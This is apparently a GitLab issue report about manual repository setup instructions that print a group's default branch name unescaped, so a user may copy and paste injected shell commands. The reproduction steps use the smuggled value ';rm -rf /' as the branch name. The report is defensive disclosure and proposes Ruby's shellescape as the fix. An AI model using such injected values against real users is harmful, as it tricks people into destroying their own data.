Manual repo initialization instructions don't escape special characters and might lead user to copy paste malicious commands
Summary
Same as #328889 (closed), except for new projects in a group where the default branch name is set to something malicious.
This requires a bit of social engineering and that the victim doesn't pay attention but it's worth fixing. #328889 (closed) fixed the same issue for merge requests, however the MR view is in Vue.js and this is a HAML view so we can't reuse the same fix.
Steps to reproduce
- Create a group
- Set the default branch name to something like
;rm -rf /
in Settings > Repository - Create a new public project
- Trick someone into initializing it and hope they copy paste the instructions without paying attention
Example Project
What is the current bug behavior?
Default branch name is output as is.
What is the expected correct behavior?
Default branch name should be escaped.
Relevant logs and/or screenshots
Output of checks
This bug happens on GitLab.com
Results of GitLab environment info
Expand for output related to GitLab environment info
(For installations with omnibus-gitlab package run and paste the output of: `sudo gitlab-rake gitlab:env:info`) (For installations from source run and paste the output of: `sudo -u git -H bundle exec rake gitlab:env:info RAILS_ENV=production`)
Results of GitLab application Check
Expand for output related to the GitLab application check
(For installations with omnibus-gitlab package run and paste the output of:
sudo gitlab-rake gitlab:check SANITIZE=true
)(For installations from source run and paste the output of:
sudo -u git -H bundle exec rake gitlab:check RAILS_ENV=production SANITIZE=true
)(we will only investigate if the tests are passing)
Possible fixes
We should use shellescape
which is a String
method in Ruby.